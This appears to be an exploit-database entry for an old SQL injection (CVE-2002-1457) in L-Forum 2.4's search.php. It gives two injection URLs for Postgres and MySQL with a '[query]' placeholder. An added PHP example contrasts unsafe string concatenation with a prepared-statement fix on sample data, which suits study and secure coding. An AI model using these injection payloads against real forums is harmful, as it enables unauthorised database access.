NeoSense

Leszek Krupinski L-Forum 2.4 - Search Script SQL Injection

Author: Matthew Murphy
type: webapps
platform: php
port: nan
date_added: 2002-08-14 
date_updated: 2012-10-03 
verified: 1 
codes: CVE-2002-1457;OSVDB-10113 

source: https://www.securityfocus.com/bid/5468/info

Reportedly, L-Forum is vulnerable to SQL injection attacks. The vulnerability lies in the file 'search.php'.

L-Forum does not properly sanitize the user input passed in the search parameter of the 'search.php' file. SQL code may be inserted into requests and executed by the database server.

Postgres:
http://localhost/search.php?search=a%27%20order%20by%20time%20desc%3b%20[query]

MySQL:
http://localhost/search.php?search=a%25%27%20order%20by%20time%20desc%3b%20[query]
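
The flaw class described above, and its fix, as an added example that is not L-Forum's code: the search value from the Postgres request is placed into a concatenated query string (printed, never executed) and then passed through a prepared statement. The `posts` table, its columns, and the functions `buildQueryUnsafe` and `searchSafe` are assumptions made for the demonstration.

```php
<?php
// Added illustration. The posts table, its columns and both functions are
// assumptions for the demo, not L-Forum's schema or code.

// Vulnerable pattern: the raw parameter is pasted into the SQL text.
function buildQueryUnsafe(string $search): string
{
    return "SELECT id, subject FROM posts WHERE subject LIKE '%" . $search . "%'";
}

// Hardened pattern: the SQL text is fixed and the term travels as a bound
// value. LIKE wildcards in the term are escaped so they match literally.
function searchSafe(PDO $pdo, string $search): array
{
    $literal = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $search);
    $stmt = $pdo->prepare(
        "SELECT id, subject FROM posts WHERE subject LIKE :pat ESCAPE '!' ORDER BY time DESC"
    );
    $stmt->execute([':pat' => '%' . $literal . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database (needs pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, subject TEXT, time INTEGER)');
$pdo->exec("INSERT INTO posts (subject, time) VALUES ('a first post', 1), ('it''s a reply', 2)");

// The search value from the page's Postgres request after URL decoding;
// [query] is the page's own placeholder and stays a placeholder here.
$input = urldecode('a%27%20order%20by%20time%20desc%3b%20[query]');

// Concatenation: the quote in the input closes the string literal, so the
// text after it is parsed as SQL. Printed only, never executed.
echo buildQueryUnsafe($input), PHP_EOL;

// Bound parameter: the same input is only a search term and matches no row.
var_dump(count(searchSafe($pdo, $input)));

// An ordinary term containing a quote still finds its row.
var_dump(count(searchSafe($pdo, "it's")));
```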